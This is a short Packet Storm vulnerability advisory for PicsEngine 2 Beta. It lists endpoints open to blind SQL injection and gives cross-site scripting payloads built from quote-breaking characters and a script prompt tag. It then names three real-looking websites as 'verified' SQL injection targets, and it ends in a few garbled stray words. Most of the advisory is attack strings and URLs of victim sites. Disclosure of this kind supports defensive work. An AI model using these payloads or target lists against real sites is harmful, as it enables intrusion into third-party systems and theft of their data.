PicsEngine 2 Beta Cross Site Scripting / SQL Injection

2014-03-09T00:00:00
ID PACKETSTORM:125618
Type packetstorm
Reporter indoushka
Modified 2014-03-09T00:00:00

Description

                                        
                                            `PicsEngine Application error message Vulnerability  
==================================================  
Author indoushka  
==================================================  
vendor : Powered by PicsEngine 2 Beta  
==================================================  
  
Blind SQL Injection :  
  
/chabluesphotos/xml/comments.php?id=if  
/chabluesphotos/xml/get.php?id=if  
/chabluesphotos/xml/photos.php?id=if  
  
Cross site scripting (verified)  
  
/chabluesphotos/xml/comments.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>  
/chabluesphotos/xml/get.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>  
/chabluesphotos/xml/photos.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>  
  
SQL injection (verified)  
  
http://www.tsampa.be/pics/xml/photos.php?id=1  
  
http://www.sylval.com/galerie/xml/photos.php?id=1  
  
http://lacroizette.sur-le-web.fr/locaux/xml/photos.php?id=1  
  
ube pcr  
llc  
`